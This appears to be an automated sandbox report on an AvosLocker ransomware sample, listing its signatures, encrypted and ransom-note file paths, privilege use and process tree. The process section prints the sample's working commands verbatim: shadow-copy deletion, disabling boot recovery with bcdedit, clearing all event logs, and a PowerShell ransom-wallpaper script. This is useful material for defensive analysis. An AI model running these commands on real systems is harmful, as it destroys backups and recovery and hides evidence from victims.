Malware Analysis Report

2024-10-16 03:26

Sample ID 240909-tyy34ayalr
Target 240908-rntphssgre_pw_infected.zip
SHA256 e76ac2944fb3f66037bc7dd7e83f63bc58099ff2fe31658085c1fdf3d99e3f87
Tags
avoslocker defense_evasion discovery evasion execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e76ac2944fb3f66037bc7dd7e83f63bc58099ff2fe31658085c1fdf3d99e3f87

Threat Level: Known bad

The file 240908-rntphssgre_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion discovery evasion execution impact ransomware

Avoslocker Ransomware

Deletes shadow copies

Renames multiple (8501) files with added filename extension

Renames multiple (10420) files with added filename extension

Modifies boot configuration data using bcdedit

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Unsigned PE

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Interacts with shadow copies

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-09 16:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-09 16:28

Reported

2024-09-09 16:31

Platform

win7-20240704-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (10420) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\672180750.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18236_.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00942_.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\it-IT\msdasqlr.dll.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Casual.css C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107132.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212601.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01568_.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14829_.GIF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15059_.GIF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mr.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107150.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107264.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\SpiderSolitaire.exe.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATHEDITOR_F_COL.HXK C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\ELPHRG01.WAV C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00807_.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\WT61FR.LEX C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45B.GIF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\settings.css C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Grid.thmx C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Common Files\System\ado\en-US\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\af\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Windows Photo Viewer\en-US\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1580 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 880 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2968 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2968 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2052 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2052 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2052 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2972 wrote to memory of 3452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2972 wrote to memory of 3452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2972 wrote to memory of 3452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 992 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 992 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 992 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1580 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3912 wrote to memory of 4568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3912 wrote to memory of 4568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3912 wrote to memory of 4568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3912 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 3912 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 3912 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\672180750.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 01188d22b1675e3437b1418e14f4ffab
SHA1 6e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256 e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA512 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

memory/2900-1115-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

memory/2900-1277-0x0000000001E10000-0x0000000001E18000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0c650ec4ce86e3c53a9c48691d14eeb4
SHA1 87f69172e420e7e19fb9e0bdf9751d37b19cbfa3
SHA256 5c28ecf103e05989a86cead08344b4ac1bf8a9fb5a781e78330779c15b5ff8d4
SHA512 06ea99da239576afd07830534ab57a80d8e13a33b2e0f09c126a2ce7f90136568860e3b2c5ed25ca90cb00d827dc5338e362c22d48d8618ed8d45ae69582f881

